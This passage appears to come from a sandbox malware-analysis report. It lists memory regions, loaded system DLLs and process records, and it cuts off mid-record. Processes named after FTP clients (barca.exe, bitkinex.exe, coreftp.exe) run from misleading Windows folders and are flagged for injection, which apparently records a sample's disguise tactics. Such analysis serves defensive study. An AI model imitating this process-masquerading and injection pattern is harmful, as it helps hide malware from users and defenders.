region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2619 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2620 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2621 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2622 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2623 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2624 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2625 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2626 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2627 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2628 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2629 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2630 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2631 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2632 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2633 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2634 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2636 start_va = 0x590000 end_va = 0x6ccfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Thread: id = 127 os_tid = 0x11c8 Process: id = "29" image_name = "barca.exe" filename = "c:\\program files (x86)\\windows portable devices\\barca.exe" page_root = "0x5ccb4000" os_pid = "0x11cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\barca.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2637 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2638 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2639 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2640 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2641 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2642 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 2643 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 2644 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2645 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2646 start_va = 0x120000 end_va = 0x136fff monitored = 0 entry_point = 0x1214a1 region_type = mapped_file name = "barca.exe" filename = "\\Program Files (x86)\\Windows Portable Devices\\barca.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\barca.exe") Region: id = 2647 start_va = 0x140000 end_va = 0x1fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2648 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2649 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2650 start_va = 0x600000 end_va = 0x603fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2651 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 2652 start_va = 0x680000 end_va = 0x73bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 2653 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 2654 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 2655 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 2656 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2657 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 2658 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 2659 start_va = 0x20d0000 end_va = 0x2a93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020d0000" filename = "" Region: id = 2660 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2661 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2662 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2663 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2664 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2665 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2666 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2667 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2668 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2669 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2670 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2671 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2672 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2673 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2674 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2675 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2676 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2677 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2678 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2679 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2680 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2681 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2682 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2683 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2684 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2685 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2687 start_va = 0x500000 end_va = 0x5c4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Thread: id = 128 os_tid = 0x11d0 Process: id = "30" image_name = "bitkinex.exe" filename = "c:\\program files\\windows media player\\bitkinex.exe" page_root = "0x607be000" os_pid = "0x11d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Media Player\\bitkinex.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2688 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2689 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2690 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2691 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2692 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2693 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2694 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2695 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2696 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2697 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2698 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2699 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2700 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2701 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2702 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2703 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 2704 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2705 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 2706 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 2707 start_va = 0xb40000 end_va = 0xbfbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 2708 start_va = 0xda0000 end_va = 0xdb6fff monitored = 0 entry_point = 0xda14a1 region_type = mapped_file name = "bitkinex.exe" filename = "\\Program Files\\Windows Media Player\\bitkinex.exe" (normalized: "c:\\program files\\windows media player\\bitkinex.exe") Region: id = 2709 start_va = 0xdc0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 2710 start_va = 0x21c0000 end_va = 0x2b83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 2711 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2712 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2713 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2714 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2715 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2716 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2717 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2718 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2719 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2720 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2721 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2722 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2723 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2724 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2725 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2726 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2727 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2728 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2729 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2730 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2731 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2732 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2733 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2734 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2735 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2736 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2738 start_va = 0xc00000 end_va = 0xd9dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Thread: id = 129 os_tid = 0x11d8 Process: id = "31" image_name = "coreftp.exe" filename = "c:\\program files\\windows portable devices\\coreftp.exe" page_root = "0x5f1c6000" os_pid = "0x11dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\coreftp.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2740 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2741 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2742 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2743 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2744 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2745 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2746 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2747 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2748 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2749 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2750 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2751 start_va = 0x2a0000 end_va = 0x2a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2752 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2753 start_va = 0x310000 end_va = 0x3cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 2754 start_va = 0x3f0000 end_va = 0x406fff monitored = 0 entry_point = 0x3f14a1 region_type = mapped_file name = "coreftp.exe" filename = "\\Program Files\\Windows Portable Devices\\coreftp.exe" (normalized: "c:\\program files\\windows portable devices\\coreftp.exe") Region: id = 2755 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2756 start_va = 0x600000 end_va = 